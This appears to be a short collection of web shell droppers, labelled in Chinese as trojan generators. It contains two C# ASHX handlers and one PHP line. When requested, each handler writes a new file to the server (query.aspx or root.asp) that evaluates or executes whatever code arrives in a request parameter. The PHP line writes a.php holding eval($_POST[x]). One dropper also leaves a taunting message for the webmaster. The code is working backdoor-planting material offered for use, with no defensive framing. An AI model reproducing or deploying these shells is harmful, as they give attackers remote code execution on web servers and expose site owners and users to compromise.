///////////////////////////////////////////////////////
访问ashx生产aspx木马

<%@ WebHandler Language="C#" Class="Handler" %> 
using System; 
using System.Web; 
using System.IO; 
public class Handler : IHttpHandler { 
public void ProcessRequest (HttpContext context) { 
context.Response.ContentType = "text/plain";
string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"keio\"]"+",\"unsafe\");%>Hey web master,Have a nice day o.O? I hope so! HaHa"; 
StreamWriter file1= File.CreateText(context.Server.MapPath("query.aspx")); 
file1.Write(show); 
file1.Flush(); 
file1.Close(); 
             
        } 
     
        public bool IsReusable { 
            get { 
                return false; 
            } 
        } 
     
    }
/////////////////////////////////////////////////////
访问ashx生成asp木马

<%@ WebHandler Language="C#" class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();

}

public bool IsReusable {
get {
return false;
}
}

}
///////////////////////////////////////////////////
php生php木马

fputs(fopen('./a.php',w+'),'<?phpeval ($_POST[x]);?>') 
////////////////////////////////////////////////////